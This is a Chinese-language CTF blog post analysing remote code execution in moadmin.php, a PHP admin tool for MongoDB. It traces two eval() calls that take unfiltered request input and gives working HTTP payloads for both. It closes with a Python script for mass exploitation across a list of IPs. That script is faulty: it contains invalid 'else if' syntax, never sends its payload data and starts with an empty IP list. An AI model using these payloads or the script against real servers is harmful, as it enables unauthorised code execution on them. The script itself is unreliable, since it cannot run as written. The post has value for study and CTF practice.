---
title: monogodb moadmin.php漏洞分析
date: 2018-10-28
tags:
  - CTF

---

moadmin.php漏洞分析

<!--more-->

## moadmin.php代码执行漏洞

简单的对moadmin.php的漏洞进行了下分析，先搜索一些常见漏洞函数，发现两处eval函数调用

saveObject

![](monogodb-moadmin-php漏洞分析/01.png)

listRows

![](monogodb-moadmin-php漏洞分析/2.png)

先看下追踪下saveObject函数

```php
if (isset($_POST['object'])) {
            if (self::$model->saveObject($_GET['collection'], $_POST['object'])) {
                return $this->_dumpFormVals();
            } else {
                $action = 'editObject';
                $_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.';
            }
        }
```

并未对传入的数据进行过滤，也就是说可以直接构造payload

```php
POST /moadmin.php?collection=admin HTTP/1.1
......
......

object=1;phpinfo();exit();
```

即可返回phpinfo界面

再看下listRows函数

```php
if (isset($_GET['find']) && $_GET['find']) {
            $_GET['find'] = trim($_GET['find']);
            if (strpos($_GET['find'], 'array') === 0) {
                eval('$find = ' . $_GET['find'] . ';');
            } else if (is_string($_GET['find'])) {
                if ($findArr = json_decode($_GET['find'], true)) {
                    $find = $findArr;
                }
            }
        }
```

只要find存在即可构造payload,需要注意的是这里find的值里要存在array，且放在开头位置

```php
POST /moadmin.php?collection=admin&action=listRows&find=array(1);phpinfo();exit() HTTP/1.1
......
......
```

批量利用的python脚本

```python
#coding:utf-8
import requests
ip = []
#导入IP
url = 'http://{0}/moadmin.php?collection=admin'
data = {
    'object':"object=1;system('getFlag');exit();"
}
eCount = 0 #错误次数
while len(ip):
    for i in ip:
        res = requests.get(url.format(i))
        if 'I/O Error' in res.text:
            print(i,"Try again later...")
        else if 'Congratulation' in res.text:
            print(i,"Success get it!")
            ip.remove(i)
        else:
            print(i,"May be something error...")
            eCount = eCount + 1
            if eCount >= 10:
                print("No,fatal error!")
                exit()
        
```

